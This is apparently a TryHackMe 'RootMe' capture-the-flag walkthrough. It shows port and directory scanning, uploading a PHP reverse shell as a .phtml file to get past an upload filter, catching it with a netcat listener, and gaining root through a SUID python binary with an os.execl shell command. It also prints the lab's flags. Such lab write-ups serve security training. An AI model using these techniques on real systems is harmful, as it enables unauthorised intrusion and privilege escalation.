RootMe TryHackMe

performed by: jb-williams

Deploy the machine

Reconnaissance

  • To get info on the target, run this nmap command:
nmap -v -T4 -sV -sC -oA nmap/initial 10.10.105.101
  • This provides the answers to the following three questions.

Scan the machine, how many ports ar open?

  • Answer: 2

What version of Apache is running?

  • Answer: 2.4.29

What service is running on port 22?

  • Answer: ssh

Find directories on the web server using the GoBuster tool.

  • To find directories you can use gobuster but I prefer feroxbuster.
  • Here are the respective commands I would run:
gobuster dir -u http://10.10.105.101 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o gobust.txt -t 15
  • Since this(below) is my normal command, I also have it set to go through my webproxy so I can capture the requests/responses.
feroxbuster -w /urs/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o ferox-initial.txt -t 15 -L 15 -s 200,302,304 -P http://localhost:8080 -e -u http://10.10.105.101/

What is the hidden direcotry?

  • Answer: /panel/

Getting a Shell

Find a form to upload and get a reverse shell, and find the flag.

  • With the feroxbuster scan I found both /panel/ and /uploads/
  • Traversing to http://<IP>/panel/, there seems to be a file upload page.
  • Tried uploading a reverse shell .php file from pentestmonkey. It would not allow that extension so I attempted several other PHP file exetensions.
  • After a few, I landed on being able to upload a .phtml file.
  • Then going to the previously mentioned http://<IP>/uploads/, You can see the previously uploaded files as a directory listing.

user.txt

  • Setup a listener on the port you had provided in the revere shell which nc
nc -lvnp 4444
  • Then clicking on your .phtml reverse shell file in the /uploads/ will give you a reverse shell one that server.
  • They give us a prompt for the user.txt, if there is a file avail
cat $(find / -type f -iname user.txt 2> /dev/null)
  • If you cat that file you get the user flag

  • Answer: THM{y0u_g0t_a_sh3ll}

Privilege Escalation

Search for files with SUID permission, which file is weird?

  • To find all SUID files, you can use this command:
find / -perm -4000 2>/dev/null
  • Looking through the output, sort of using my local machine as a references, this binary looks out of place.

  • Answer: /usr/bin/python

Find a form to escalate your privileges.

  • Knowing that we have access to the SUID /usr/bin/python, the first thing I tend to do is check GTFOBins, to see if there are any options there.
  • After attempting the one listed. I actually couldn’t get it to work properly, so after looking at previous notes and trying different ways, I found these two commands each work depending on you shell preference.
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

or

python -c 'import os; os.execl("/bin/bash", "bash", "-p")'

root.txt

  • After using that python command, root access was given, again they prompted us with root.txt, assuming it was in the /root directory I just used cat on the absolute path.
  • You could also use this command if the file was not in the /root directory.
cat $(find / -type f -iname root.txt 2> /dev/null)
  • Answer: THM{pr1v1l3g3_3sc4l4t10n}

written and performed by jb-williams - github